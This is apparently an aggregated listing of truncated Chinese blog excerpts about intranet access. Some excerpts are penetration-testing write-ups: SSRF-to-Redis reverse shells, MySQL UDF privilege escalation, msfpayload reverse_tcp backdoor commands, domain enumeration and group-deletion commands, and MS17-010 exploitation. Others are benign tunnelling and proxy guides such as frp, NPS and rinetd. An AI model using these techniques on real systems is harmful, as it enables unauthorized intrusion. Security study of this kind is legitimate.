在写下一个大块之前,补充一些小知识点,也没啥新东西 0x01简介 如果常规扫描服务,结果不理想,非常GG,可以考虑使用SPN进行服务扫描,这是为了借助Kerberos的正常查询行为(向域控发起LDAP查询)作掩护进行设备难以探测的扫描 SPN(服务主体名service principal name)是微软为了在域环境中方便管理资源而为每种资源分配设计的一种表示方法(或者说SPN是使用Kerberos身份验证的网络中唯一的标识 符),凡是使用Kerberos身份验证的网络中,都必须在机器账号或用户…

摘要:存在ssrf漏洞的站点主要利用四个协议,分别是http.file.gopher.dict协议. file协议拿来进行本地文件的读取,http协议拿来进行内网的ip扫描.端口探测,如果探测到6379端口,那么可以利用http.gopher.dict这几个协议来打开放6379端口的redis服务(一般开放了这个端口的是redis服务),原理是利用他们以目标机的身份执行对开启redis服务的内网机执行redis命令,最后反弹shell到我们的公网ip机上. 一.进行内网探测 利用http协议对内…

通过Nginx代理实现内网主机访问公网和接口服务 1.需求: m2.test.com为公司测试环境的微信测试域名,因为要调用微信服务接口需要访问外网,现通过Nginx代理现实此功能. 2.环境如下: 10.20.9.31 为内网测试环境Nginx的代理主机,代理测试环境的java程序. 10.100.64.18 是Nginx反向代理主机,公网映射地址为:124.251.12.198,在此上面配置的域名通过解析后可以直接访问公网. 10.100.230.10 也是Nginx的代理主机,通过NAT转…

工具下载地址:hscan1.2.zip 界面简单,看配置: 这里我们主要需要配置的是模块和参数 模块,按照默认配置就行,取消 check HTTP vulnerability(漏洞检测) 会更快一点. 参数设置,改成你所拿到的服务器所在的网段. 接下来开始扫描: 已经在扫描了,并且扫描结束以后会给生成一份报告. 这是扫描到的弱口令 扫描报告. PS:hscan还提供mysql.exe可以直接点击连接来连接内网中的数据库.…

80端口中对应一些web靶场,在这里不记录 111端口的利用是向rpcbind服务的UDP套接字发送60字节载荷,便可填充目标内存,搞崩主机系统.在这里也不记录 Samba服务简介 Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成.SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务.SMB协议是客户机/服务器型协议,客户机通过该协…

<?php $url = isset($_REQUEST['u'])?$_REQUEST['u']:null; $ip = isset($_REQUEST['i'])?$_REQUEST['i']:null; if($url != null){ $host = getHost($url); echo getCss($host,getHtmlContext($url)); }else if($ip != null){ $useIP = substr($ip,0,strripos($ip,".…

利用MySQL提权原理: 1.具有mysql的root权限,且mysql以system权限运行. 2.具有执行sql语句的权限,webshell或者外连皆可 UDF提权 UDF(user defined function 用户自定义函数)提权,要求有写权限(secure_file_priv要么为空,要么设置路径),单引号未被过滤 原理: UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数.(其中包括了执行系统命令的函数)要想利用udf,必须上传udf.dll作为udf的执行库. my…

准备 域名解析 将frp.xx.com解析到服务器ip,将泛域名 *.frp.xx.com解析到frp.xx.com即可 https证书申请 泛域名证书现在可以用acme.sh申请Let's Encrypt证书,坑挖好了 ,看这里 [新手教程]申请https泛域名解析 GitHub下载最新编译文件 GitHub frp releases 复制frps和frps.ini文件到frps目录下 frps --frps --frps.ini --Dockerfile 修改frps.ini配置文件 只需要…

常规的,从web业务撕开口子url:bit.tcl.comgetshell很简单,phpcms的,一个Phpcms V9 uc api SQL的老洞直接getshell,拿到shell,权限很高,system看看网卡信息 只有一块网卡,处于10.4.22的私网地址在这里,如果我们想要通过这台机器对内网进行渗透,首要工作就是进行内网探测,介绍几个方法0x00如果你只是需要对内网的业务主机进行渗透,那么可以优先查看一下hosts,针对hosts中的主机针对性渗透0x01如果想要对整个C段主机进行渗透…

可以通过端口映射的方式,来通过具有公网的云服务器 ECS 访问用户名下其它未购买公网带宽的内网 ECS 上的服务.端口映射的方案有很多,比如 Linux 下的 SSH Tunnel.rinetd,Windows 下的 portmap 等,本文简要介绍 rinetd,和 ssh tunnel 的配置方法. 说明:本文相关配置和说明仅用于示例和操作指引,阿里云不对相关操作结果及由此产生的问题负责. rinetd 配置方法 如果是 Ubuntu 系统,可以直接使用如下指令安装:  apt-get in…

一.场景说明: 可以通过端口映射的方式,来通过具有公网的云服务器 ECS 访问用户名下其它未购买公网带宽的内网 ECS 上的服务.端口映射的方案有很多,比如 Linux 下的 SSH Tunnel.rinetd,Windows 下的 portmap 等,本文简要介绍 rinetd 的配置方法 二.rinetd配置方法: ubuntu系统,可以直接一键安装(建议此种方式,简单快速): apt-get install rinetd -y 源码安装配置方法: 1.下载并解压rinetd软件包: wge…

2.1         内网服务唯一端口外网映射 (一)       组网图 (二)       简要说明: 如标题所示,该功能可以实现内网环境下所有服务端口通过nginx的正向代理通过唯一端口映射至外网环境:且当本地服务设置特定域名后,外网可直接使用内网服务自定义的域名加映射端口进行访问. 如下图: 实现功能:外网访问各个服务自定义的域名+统一的映射端口进行访问. 可解决问题: (一)   映射端口量实现无限量 有效解决内网路由端口数量不足的情况,由于常规的路由器对外可支持的映射端口为20个,…

如何在离线环境或纯内网环境的Linux机器上安装部署Docker服务或其他服务.本次我们以Docker服务和Ansible服务为例. 获取指定服务的所有rpm包 保证要获取rpm包的机器能够上网. 本次我们以Docker服务和Ansible服务为例. 修改配置实现:yum安装后保留rpm包 在linux上,使用yum安装,默认安装完成之后会删除下载的rpm包:想要yum安装软件后,还保留安装包,那么需要修改 /etc/yum.conf 配置文件中的keepcache参数. 1 [root@doc…

(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接,针对linux想办法使用反弹shell来本地连接. ① Webshell应该都可以调用系统cmd执行一些简单的命令,那么whoami(查看当前权限),netuser(查看用户/组),systeminfo(查看系统补丁修复情况)等常见命令应该是首先被执行 探测的. I: 不具备系统权限: ①  Ser…

x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPOR…

0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行.本地监听即可获得meterpreter shell. reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPO…

域内信息收集常用命令 net group /domain //获得所有域用户组列表 net group zzh /domain //显示域中zzh组的成员 net group zzh /del /domain //删除域中zzh组 net group zzh andy /del /domain //删除域内zzh 群组中的成员 andy net group zzh /add /domain //增加zzh域中的群组 net group "domain admins" /domain /…

@Webkio 前言: 最近在跟朋友搞一些项目玩,所以最近没怎么更新内容接下来我将在虚拟中模拟内网多层靶场,进行内网渗透实验,超详细,适合小白.本文仅供网安学习,不可利用于未授权渗透工作中,否则后果自负.码字截图不易,转载记得署名. 微信关注公众号: JiuZhouSec 不定期更新渗透干货,适合小白学习.九州大地,一起Dayday UP! 模拟内网靶场 进行内网实验 我将从以下几点简述:[上线边界机器]-[内网渗透]-[横向移动]-[痕迹清除] 实验码字不易,转载文章请署名 实验对象 这边基于…

实验环境搭建 漏洞详情 (qiyuanxuetang.net) "此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集.Web攻防.代码审计.漏洞利用.内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法." win7密码 sun\heart 123.com sun\Administrator dc123.com 2008密码 sun\admin 2020.com 拓扑图大致如下 攻击机kali:192.168.200.3…

一.背景 一般Dubbo服务都是通过内网调用,Dubbo服务启动时默认会将服务注册到内网IP,消费端就无法从外网访问. 二.解决过程 1.Linux的hosts中设置外网IP a) 通过hostname命令得到机器名 b) 通过vim /etc/hosts设置机器名对应的外网IP 127.0.0.1  localhost  localhost.localdomain 外网IP VM_31_182_centos (这里VM_31_182_centos为主机名,默认在第一行,需要移到第二行外网IP后…

https://jingyan.baidu.com/article/ca00d56c710ef9e99eebcf85.html 只有一台能上网的电脑就可以自己免费搭建服务器,本经验简单介绍家用tp-link路由器怎么来设置端口映射,通过内网设置端口映射对外开放端口搭建服务器服务 工具/原料 tp-link路由器 TP-link路由器端口映射设置 设置端口映射首先需要判断路由器的IP地址,一般就是您当前的上网网关啦.通过cmd命令行输入 ipconfig 查看默认网关设置项目 在浏览器上打开默认网…

最近关注GB28181的朋友很多,昨天有位朋友问到GB28181出内网的问题,希望我花5分钟的时间 讲讲如何通过GB28181协议将内网的摄像机视频推送到公网.要说清楚这个问题,5分钟的时间应该不 够,还是写篇文章跟大家分享下. 说这个问题之前,我想先聊聊GB28181协议,首先我们需要了解的是GB28181是应用层协议,而 不是传输层协议.所谓应用层协议说简单点就是发送方跟接收方商议怎么协作:比如第一个信令由谁 发起,视频流的采用什么封装格式,什么时候开始推送视频,什么时候结束推送等等.GB2…

说在前面:ntp和ntpdate区别 ①两个服务都是centos自带的(centos7中不自带ntp).ntp的安装包名是ntp:ntpdate的安装包是ntpdate.他们并非由一个安装包提供. ②ntp守护进程为ntpd,配置文件是/etc/ntp.conf ③ntpdate用于客户端的时间矫正,非NTP服务器可以不启动NTP. 简介:ntp全名 network time protocol .NTP服务器可以为其他主机提供时间校对服务. 环境准备:两台服务器,一台作为NTP服务器,另一台作为…

魏刘宏 2019 年 5 月 19 日 一.使用一键脚本搭建服务端 Frp 这个内网穿透项目的官方地址为 https://github.com/fatedier/frp ,不过我们今天搭建服务端时不直接使用这个,而是使用了网友做的一键安装脚本,地址为 https://github.com/clangcn/onekey-install-shell/tree/master/frps . 那么我们就开始吧,emmmm,对了,你应该有自己的服务器或 VPS 吧?没有的话,您就看个乐呵吧 O(∩_∩)O…

前端时间做新项目的时候遇到一个dubbo的一个问题,在我们项目搭建好后使用了其他同事的支付服务,支付服务架构的方式使用了dubbo服务的方式,使用zookeeper作为注册中心,我们新项目使用dubbo注解的方式引用dubbo服务,然后项目启动的时候发生了我们最不愿意看到的一件事,项目跑不起来了.查看了一下服务,确认服务没有挂,并且在dubbo的管理工具上也找到了这个服务,回到程序报错去看(测试服务器还在使用,就没还原报错信息),发现了一个没见过的IP,很明显是一个内网IP.支付服务跟注册中心都…

之前尝试过otunnel,也记录过使用方法,见[笔记] 使用otunnel从外网访问内网,但是用了几天发现还是不够稳定. 然后尝试frp,发现性能稳定,够用,将过程及配置分享在这里吧. 需求 内网机器没有公网IP,但是可以访问外网,现在需要从外网访问内网机器. 举例,在家里机器A访问公司内网机器B. 前提 需要一台有公网IP的服务器S做中转,这样就可以打通AB两端了. A <---> S <---> B 环境 家中A机,Win10 服务器S,Ubuntu 16.04 LTS 64…

在红蓝对抗中,当拿到了位于边界主机的权限后,我们通常会以此为跳板,搭建一个通往内网的隧道,以此继续渗透内网.而在内网中首先想到的就是MS17-010了,因为在内网中,安全措施相对较弱,很多主机存在此漏洞. 现在有这么一个场景,我们通过web漏洞拿到了内网提供web服务器的主机192.168.10.10,并且搭建了通往内网的隧道,现在我们通过探测发现内网主机192.168.10.14存在MS17-010漏洞,所以我们现在就要利用MSF对其进行攻击了. 我们内网的kali主机,ip为192.168.…

FastTunnel - 打造人人都能搭建的内网穿透工具 FastTunnel是用.net core开发的一款跨平台内网穿透工具,它可以实现将内网服务暴露到公网供自己或任何人访问. 与其他穿透工具不同的是:FastTunnel项目致力于打造一个易于扩展.易于维护的内网穿透框架,任何人都可以基于该框架二次开发,你可以直接通过nuget安装依赖进行开发,当然它也是开箱即用的工具. 荣获GVP开源项目 FastTunnel荣获开源中国2020最有价值开源项目 开源仓库地址 github: https:…

一.简介 NPS是一款轻量级,高性能,强大功能的内网穿透代理服务器.目前支持TCP,UDP流量转发,可支持任何TCP,UDP上层协议(访问内网网站,本地支付接口调试,SSH访问,远程桌面,内网dns解析等等......),此外还支持内网http代理,内网socks5代理,p2p等,并带有功能强大的网络管理端. 源码地址:https://github.com/cnlh/nps 发布地址:https://github.com/cnlh/nps/releases 通常内网穿透工具都有服务端和客户端,安…

对于没有公网 IP 的内网用户来说,远程管理或在外网访问内网机器上的服务是一个问题. 今天给大家介绍一款好用内网穿透工具 FRP,FRP 全名:Fast Reverse Proxy.FRP 是一个使用 Go 语言开发的高性能的反向代理应用,可以帮助您轻松地进行内网穿透,对外网提供服务.FRP 支持 TCP.UDP.HTTP.HTTPS等协议类型,并且支持 Web 服务根据域名进行路由转发. FRP 项目地址:https://github.com/fatedier/frp 1.安装 首先去frp的…